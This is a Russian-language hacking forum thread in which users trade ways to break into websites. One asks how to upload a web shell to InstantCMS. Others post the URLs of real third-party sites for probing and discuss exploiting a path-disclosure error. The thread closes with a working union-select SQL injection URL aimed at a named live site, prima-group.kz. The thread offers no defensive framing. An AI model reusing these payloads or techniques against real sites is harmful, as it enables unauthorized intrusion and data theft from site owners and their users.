кто нибудь знает как залить шел в Instantcms, доступ в админку есть.

Очень понятно.С помощтю спиритического анализа,и работе с духами могу сказать одно: для подтверждения ваших догадок,необходимо отпубликовать в теме исходный url.тоесть - оригинальный адрес сайта.

www.avroragro.ru/index.php?option=com_virtuemart&Itemid=16&lang=ru& next_page=account.shipping&page=account.shipto

оригинал

Эм
Это никак не уязвимость,просто движок тебе сообщает о вещах насущных.

есть ошибка
Notice: Undefined offset: 0 in /var/www/virtual/bla-bla-bla/htdocs/blocks/content.php on line 40
которая появляется если сделать запрос типа
http://bla-bla-bla/index.php?showmenu=true&id=999999999999999
что можно с этого поиметь???

Ты уже поимел из нее все что можно,а именно - раскрытие пути.
Выложи ссылочку на хост,посмотрим что еще там можно "поиметь".

Раз уж на вопрос не ответили,буду археологом,просто не видел раньше.
Слуш всегда экранирует сам себя,(!)но только тогда,когда слеш который должен экранироваться,не экранирует кавычку.Тоесть например:
Подругому не бывает
ps, что бы вернуть соли пержний облик,просто прогони ее через stripslashes();

www.prima-group.kz

http://www.prima-group.kz/index.php?lang=en+from+menu%20where%20id=-1+union+select+TABLE_NAME,TABLE_NAME%20from%20info rmation_schema.tables+--+
SQL-inj+inc.Раскрутить не смог.